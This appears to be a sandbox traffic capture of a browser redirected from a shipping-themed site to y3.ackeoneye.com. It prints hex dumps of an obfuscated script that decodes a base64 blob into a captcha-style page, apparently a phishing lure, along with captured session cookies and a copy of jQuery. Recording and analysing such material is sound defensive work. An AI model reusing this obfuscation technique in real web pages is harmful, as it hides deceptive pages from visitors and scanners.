                                                                                                                                  2025-01-27 14:44:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.549720104.21.93.2284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:55 UTC691OUTGET /lo92/ HTTP/1.1
                                                                                                                                  Host: y3.ackeoneye.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  Referer: https://deshshippinglines.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:56 UTC1250INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:56 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: no-cache, private
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2FheGu%2B4WZT3sv0VC91ZMKGbOlhzfMBTnPSXl7%2B1MqqYaBzvEllvATYJ3ZqovjtuXWie6kCHBSONpWEIr6OXfIGQrEa8HDFGg3sqD%2BNlrvQ056PoVMlaVu1iyZlMM4EaoWrFjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=865&min_rtt=852&rtt_var=345&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1605&delivery_rate=4230125&cwnd=252&unsent_bytes=0&cid=46eca5267177455b&ts=239&x=0"
                                                                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IkRXeWRhL1VkbnhPS2dxL2YwbGhuZEE9PSIsInZhbHVlIjoiYkwvQmR0anI0QjFsRUJ5RkEza0wyRFYyVFhmV0ovT1Z5TzBnUHNYaHpWTXQ1NWNvcU1KWlBJdnVjckVzZEZDcWhsREg0ekVIamxSUHVjbzBWMnVQTmJIQzVHNlVDVmNDMHBwQXhQWmJGeitYay84UVlKcDZMd2U4d29CSGpOUjgiLCJtYWMiOiJjNmUyZTAyZWY1MzZhNWNhODY0YzM5ZDNkMTk1YzIzOGRlNzgwZTRiZjM3ZGJkM2Y0MGM3ZTg2MGQxMTkyNTIxIiwidGFnIjoiIn0%3D; expires=Mon, 27-Jan-2025 16:44:55 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                  2025-01-27 14:44:56 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 68 4a 57 6b 49 7a 56 33 46 6c 57 48 6c 6d 61 6e 68 6b 64 6e 64 76 57 56 70 49 62 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 6d 39 34 64 45 70 46 57 46 46 6a 62 45 52 48 55 33 68 4b 51 53 39 30 57 6d 35 7a 4d 6a 41 72 51 57 45 32 57 56 4e 46 59 6d 35 46 61 6a 42 4b 4c 79 74 6c 54 55 35 4d 64 33 51 79 65 6d 56 49 56 6d 4a 75 62 30 6c 5a 61 30 74 52 54 7a 42 48 57 54 51 78 62 31 49 33 5a 33 59 78 54 46 4a 68 4d 47 52 6d 4f 44 4a 69 4e 58 52 35 54 55 30 32 4f 57 68 52 4e 54 64 58 61 55 46 5a 53 58 42 4e 55 6e 4d 77 5a 45 5a 78 54 30 39 33 57 69 73 35 4d 32 52 4f 53 31 4e 79 5a 57 46 77 5a 6a 4e 50 54 58 4d 7a 53 6e 59 32 59 30 59
                                                                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImhJWkIzV3FlWHlmanhkdndvWVpIbHc9PSIsInZhbHVlIjoicm94dEpFWFFjbERHU3hKQS90Wm5zMjArQWE2WVNFYm5FajBKLytlTU5Md3QyemVIVmJub0lZa0tRTzBHWTQxb1I3Z3YxTFJhMGRmODJiNXR5TU02OWhRNTdXaUFZSXBNUnMwZEZxT093Wis5M2ROS1NyZWFwZjNPTXMzSnY2Y0Y
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 32 32 37 32 0d 0a 3c 73 63 72 69 70 74 3e 0a 2f 2a 20 59 6f 75 20 6b 6e 6f 77 20 79 6f 75 20 61 72 65 20 6f 6e 20 74 68 65 20 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 69 66 20 79 6f 75 20 77 6f 75 6c 64 20 64 6f 20 79 6f 75 72 20 6a 6f 62 2c 20 61 6e 64 20 6e 6f 74 20 62 65 20 70 61 69 64 20 66 6f 72 20 69 74 2e 20 2a 2f 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 35 4d 79 35 68 59 32 74 6c 62 32 35 6c 65 57 55 75 59 32 39 74 4c 32 78 76 4f 54 49 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f 64 47 31 73 49 47
                                                                                                                                  Data Ascii: 2272<script>/* You know you are on the road to success if you would do your job, and not be paid for it. */if(atob("aHR0cHM6Ly95My5hY2tlb25leWUuY29tL2xvOTIv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sIG
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 68 61 57 35 6c 63 6e 74 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 64 47 39 77 4f 69 41 78 4e 6a 4e 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 6f 6a 55 6d 39 51 5a 57 4a
                                                                                                                                  Data Ascii: YXB0Y2hhLWNvbnRhaW5lcntwb3NpdGlvbjogcmVsYXRpdmU7dG9wOiAxNjNweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQojUm9QZWJ
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 33 52 6f 61 57 35 6e 4f 6d 46 75 64 47 6c 68 62 47 6c 68 63 32 56 6b 4f 32 5a 76 62 6e 51 74 63 33 52 35 62 47 55 36 62 6d 39 79 62 57 46 73 4f 33 30 4b 63 48 74 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 6d 4e 6c 62 6e 52 6c 63 6a 74 39 43 6e 42 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 49 77 63 48 67 37 5a 6d 39 75 64 43 31 33 5a 57 6c 6e 61 48 51 36 4e 44 41 77 4f 32 31 68 63 6d 64 70 62 6a 6f 34 63 48 67 67 4d 44 74 39 43 69 4e 6a 62 32 35 30 5a 57 35 30 65 32 46 73 61 57 64 75 4c 57 6c 30 5a 57 31 7a 4f 6d 4e 6c 62 6e 52 6c 63 6a 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 4e 6d 59 57 5a 68 5a 6d 45 37 59 6d 39 79 5a 47 56 79 4f 6a 46 77 65 43 42 7a 62 32 78 70 5a 43 41 6a 5a 54 42 6c 4d 47 55 77 4f 32 4a 76 65 43 31 7a
                                                                                                                                  Data Ascii: 3RoaW5nOmFudGlhbGlhc2VkO2ZvbnQtc3R5bGU6bm9ybWFsO30KcHt0ZXh0LWFsaWduOmNlbnRlcjt9CnB7Zm9udC1zaXplOjIwcHg7Zm9udC13ZWlnaHQ6NDAwO21hcmdpbjo4cHggMDt9CiNjb250ZW50e2FsaWduLWl0ZW1zOmNlbnRlcjtiYWNrZ3JvdW5kLWNvbG9yOiNmYWZhZmE7Ym9yZGVyOjFweCBzb2xpZCAjZTBlMGUwO2JveC1z
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 67 37 64 32 6c 6b 64 47 67 36 4d 7a 42 77 65 44 74 39 43 69 4e 7a 64 57 4e 6a 5a 58 4e 7a 4c 58 42 79 5a 53 31 70 49 47 78 70 62 6d 56 37 63 33 52 79 62 32 74 6c 4f 69 4d 77 4d 7a 67 78 4d 6a 63 37 59 57 35 70 62 57 46 30 61 57 39 75 4f 6d 5a 70 63 6d 56 33 62 33 4a 72 49 43 34 7a 63 79 42 6c 59 58 4e 6c 4c 57 39 31 64 43 41 78 4f 33 4e 30 63 6d 39 72 5a 53 31 33 61 57 52 30 61 44 6f 78 4f 33 4e 30 63 6d 39 72 5a 53 31 6b 59 58 4e 6f 59 58 4a 79 59 58 6b 36 4d 7a 49 67 4d 7a 49 37 63 33 52 79 62 32 74 6c 4c 57 52 68 63 32 68 76 5a 6d 5a 7a 5a 58 51 36 4c 54 67 37 66 51 6f 6a 63 33 56 6a 59 32 56 7a 63 79 31 30 5a 58 68 30 65 32 46 75 61 57 31 68 64 47 6c 76 62 6a 70 6d 59 57 52 6c 4c 57 6c 75 49 44 46 7a 49 47 5a 76 63 6e 64 68 63 6d 52 7a 4f 32 39 77 59
                                                                                                                                  Data Ascii: g7d2lkdGg6MzBweDt9CiNzdWNjZXNzLXByZS1pIGxpbmV7c3Ryb2tlOiMwMzgxMjc7YW5pbWF0aW9uOmZpcmV3b3JrIC4zcyBlYXNlLW91dCAxO3N0cm9rZS13aWR0aDoxO3N0cm9rZS1kYXNoYXJyYXk6MzIgMzI7c3Ryb2tlLWRhc2hvZmZzZXQ6LTg7fQojc3VjY2Vzcy10ZXh0e2FuaW1hdGlvbjpmYWRlLWluIDFzIGZvcndhcmRzO29wY
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 37 59 57 78 70 5a 32 34 74 61 58 52 6c 62 58 4d 36 59 32 56 75 64 47 56 79 4f 32 4e 31 63 6e 4e 76 63 6a 70 77 62 32 6c 75 64 47 56 79 4f 32 52 70 63 33 42 73 59 58 6b 36 5a 6d 78 6c 65 44 74 74 59 58 4a 6e 61 57 34 74 62 47 56 6d 64 44 6f 78 4e 6e 42 34 4f 33 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 62 47 56 6d 64 44 74 39 43 69 35 6a 59 69 31 73 59 6e 74 6b 61 58 4e 77 62 47 46 35 4f 6d 64 79 61 57 51 37 63 47 78 68 59 32 55 74 61 58 52 6c 62 58 4d 36 59 32 56 75 64 47 56 79 4f 33 30 4b 4c 6d 4e 69 4c 57 78 69 49 47 6c 75 63 48 56 30 65 32 4e 31 63 6e 4e 76 63 6a 70 77 62 32 6c 75 64 47 56 79 4f 32 64 79 61 57 51 74 59 58 4a 6c 59 54 6f 78 4c 7a 45 37 61 47 56 70 5a 32 68 30 4f 6a 49 30 63 48 67 37 62 57 46 79 5a 32 6c 75 4f 6a 41 37 62 33 42 68 59 32
                                                                                                                                  Data Ascii: 7YWxpZ24taXRlbXM6Y2VudGVyO2N1cnNvcjpwb2ludGVyO2Rpc3BsYXk6ZmxleDttYXJnaW4tbGVmdDoxNnB4O3RleHQtYWxpZ246bGVmdDt9Ci5jYi1sYntkaXNwbGF5OmdyaWQ7cGxhY2UtaXRlbXM6Y2VudGVyO30KLmNiLWxiIGlucHV0e2N1cnNvcjpwb2ludGVyO2dyaWQtYXJlYToxLzE7aGVpZ2h0OjI0cHg7bWFyZ2luOjA7b3BhY2
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 5a 58 67 74 5a 57 35 6b 4f 33 30 4b 49 33 52 6c 63 6d 31 7a 65 32 4e 76 62 47 39 79 4f 69 4d 79 4d 7a 49 7a 4d 6a 4d 37 5a 47 6c 7a 63 47 78 68 65 54 70 70 62 6d 78 70 62 6d 55 74 5a 6d 78 6c 65 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4f 48 42 34 4f 32 5a 76 62 6e 51 74 63 33 52 35 62 47 55 36 62 6d 39 79 62 57 46 73 4f 32 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 44 70 6d 62 47 56 34 4c 57 56 75 5a 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4d 48 42 34 4f 33 30 4b 49 33 52 6c 63 6d 31 7a 49 43 35 73 61 57 35 72 4c 58 4e 77 59 57 4e 6c 63 6e 74 74 59 58 4a 6e 61 57 34 36 4d 43 41 75 4d 6e 4a 6c 62 54 74 39 43 69 4e 30 5a 58 4a 74 63 79 42 68 65 32 52 70 63 33 42 73 59 58 6b 36 61 57 35 73 61 57 35 6c 4c 57 4a 73 62 32 4e
                                                                                                                                  Data Ascii: ZXgtZW5kO30KI3Rlcm1ze2NvbG9yOiMyMzIzMjM7ZGlzcGxheTppbmxpbmUtZmxleDtmb250LXNpemU6OHB4O2ZvbnQtc3R5bGU6bm9ybWFsO2p1c3RpZnktY29udGVudDpmbGV4LWVuZDtsaW5lLWhlaWdodDoxMHB4O30KI3Rlcm1zIC5saW5rLXNwYWNlcnttYXJnaW46MCAuMnJlbTt9CiN0ZXJtcyBhe2Rpc3BsYXk6aW5saW5lLWJsb2N
                                                                                                                                  2025-01-27 14:44:56 UTC612INData Raw: 54 41 37 59 57 35 70 62 57 46 30 61 57 39 75 4f 6e 4e 6a 59 57 78 6c 49 43 34 7a 63 79 42 6c 59 58 4e 6c 4c 57 6c 75 4c 57 39 31 64 43 41 75 4f 58 4d 67 59 6d 39 30 61 44 74 39 43 69 35 6a 59 69 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 59 57 78 70 5a 32 34 74 61 58 52 6c 62 58 4d 36 59 32 56 75 64 47 56 79 4f 32 52 70 63 33 42 73 59 58 6b 36 5a 33 4a 70 5a 44 74 6e 59 58 41 36 4d 54 4a 77 65 44 74 6e 63 6d 6c 6b 4c 58 52 6c 62 58 42 73 59 58 52 6c 4c 57 4e 76 62 48 56 74 62 6e 4d 36 4d 7a 42 77 65 43 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 6a 45 32 63 48 67 37 66 51 6f 75 62 47 39 6e 62 79 31 30 5a 58 68 30 65 32 5a 70 62 47 77 36 49 7a 41 77 4d 44 74 39 43 69 35 6c 63 6e 4a 76 63 69 31 74 5a 58 4e 7a 59 57 64 6c 65 32 4e 76
                                                                                                                                  Data Ascii: TA7YW5pbWF0aW9uOnNjYWxlIC4zcyBlYXNlLWluLW91dCAuOXMgYm90aDt9Ci5jYi1jb250YWluZXJ7YWxpZ24taXRlbXM6Y2VudGVyO2Rpc3BsYXk6Z3JpZDtnYXA6MTJweDtncmlkLXRlbXBsYXRlLWNvbHVtbnM6MzBweCBhdXRvO21hcmdpbi1sZWZ0OjE2cHg7fQoubG9nby10ZXh0e2ZpbGw6IzAwMDt9Ci5lcnJvci1tZXNzYWdle2Nv
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 31 30 62 38 0d 0a 7a 61 58 52 6c 5a 43 77 6a 64 47 6c 74 5a 57 39 31 64 43 31 79 5a 57 5a 79 5a 58 4e 6f 4c 57 78 70 62 6d 73 73 49 33 52 70 62 57 56 76 64 58 51 74 63 6d 56 6d 63 6d 56 7a 61 43 31 73 61 57 35 72 4f 6d 78 70 62 6d 73 73 49 33 52 70 62 57 56 76 64 58 51 74 63 6d 56 6d 63 6d 56 7a 61 43 31 73 61 57 35 72 4f 6e 5a 70 63 32 6c 30 5a 57 52 37 59 32 39 73 62 33 49 36 49 7a 49 7a 4d 6a 4d 79 4d 7a 74 39 43 69 4e 6c 65 48 42 70 63 6d 56 6b 4c 58 4a 6c 5a 6e 4a 6c 63 32 67 74 62 47 6c 75 61 7a 70 68 59 33 52 70 64 6d 55 73 49 32 56 34 63 47 6c 79 5a 57 51 74 63 6d 56 6d 63 6d 56 7a 61 43 31 73 61 57 35 72 4f 6d 5a 76 59 33 56 7a 4c 43 4e 6c 65 48 42 70 63 6d 56 6b 4c 58 4a 6c 5a 6e 4a 6c 63 32 67 74 62 47 6c 75 61 7a 70 6f 62 33 5a 6c 63 69 77 6a
                                                                                                                                  Data Ascii: 10b8zaXRlZCwjdGltZW91dC1yZWZyZXNoLWxpbmssI3RpbWVvdXQtcmVmcmVzaC1saW5rOmxpbmssI3RpbWVvdXQtcmVmcmVzaC1saW5rOnZpc2l0ZWR7Y29sb3I6IzIzMjMyMzt9CiNleHBpcmVkLXJlZnJlc2gtbGluazphY3RpdmUsI2V4cGlyZWQtcmVmcmVzaC1saW5rOmZvY3VzLCNleHBpcmVkLXJlZnJlc2gtbGluazpob3Zlciwj
                                                                                                                                  2025-01-27 14:44:56 UTC1369INData Raw: 42 70 62 6e 42 31 64 44 70 68 59 33 52 70 64 6d 56 2b 4c 6d 4e 69 4c 57 6b 73 4c 6e 52 6f 5a 57 31 6c 4c 57 46 31 64 47 38 67 4c 6d 4e 69 4c 57 78 69 49 47 6c 75 63 48 56 30 4f 6d 5a 76 59 33 56 7a 66 69 35 6a 59 69 31 70 65 32 4a 76 63 6d 52 6c 63 6a 6f 79 63 48 67 67 63 32 39 73 61 57 51 67 49 32 5a 69 59 57 51 30 4d 54 74 39 43 69 35 30 61 47 56 74 5a 53 31 68 64 58 52 76 49 43 35 6a 59 69 31 73 59 69 42 70 62 6e 42 31 64 44 70 6a 61 47 56 6a 61 32 56 6b 66 69 35 6a 59 69 31 70 65 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 7a 5a 6b 4e 6d 51 32 5a 44 74 39 43 69 35 30 61 47 56 74 5a 53 31 68 64 58 52 76 49 43 35 6a 59 69 31 73 59 69 42 70 62 6e 42 31 64 44 70 6a 61 47 56 6a 61 32 56 6b 66 69 35 6a 59 69 31 70 4f 6d 46 6d 64
                                                                                                                                  Data Ascii: BpbnB1dDphY3RpdmV+LmNiLWksLnRoZW1lLWF1dG8gLmNiLWxiIGlucHV0OmZvY3Vzfi5jYi1pe2JvcmRlcjoycHggc29saWQgI2ZiYWQ0MTt9Ci50aGVtZS1hdXRvIC5jYi1sYiBpbnB1dDpjaGVja2Vkfi5jYi1pe2JhY2tncm91bmQtY29sb3I6IzZkNmQ2ZDt9Ci50aGVtZS1hdXRvIC5jYi1sYiBpbnB1dDpjaGVja2Vkfi5jYi1pOmFmd


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.549722151.101.130.1374433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:57 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                  Host: code.jquery.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                  Referer: https://y3.ackeoneye.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:57 UTC611INHTTP/1.1 200 OK
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 89501
                                                                                                                                  Server: nginx
                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:57 GMT
                                                                                                                                  Age: 3473623
                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890081-NYC
                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                  X-Cache-Hits: 55, 1
                                                                                                                                  X-Timer: S1737989097.202300,VS0,VE1
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  2025-01-27 14:44:57 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                  2025-01-27 14:44:57 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                  2025-01-27 14:44:57 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
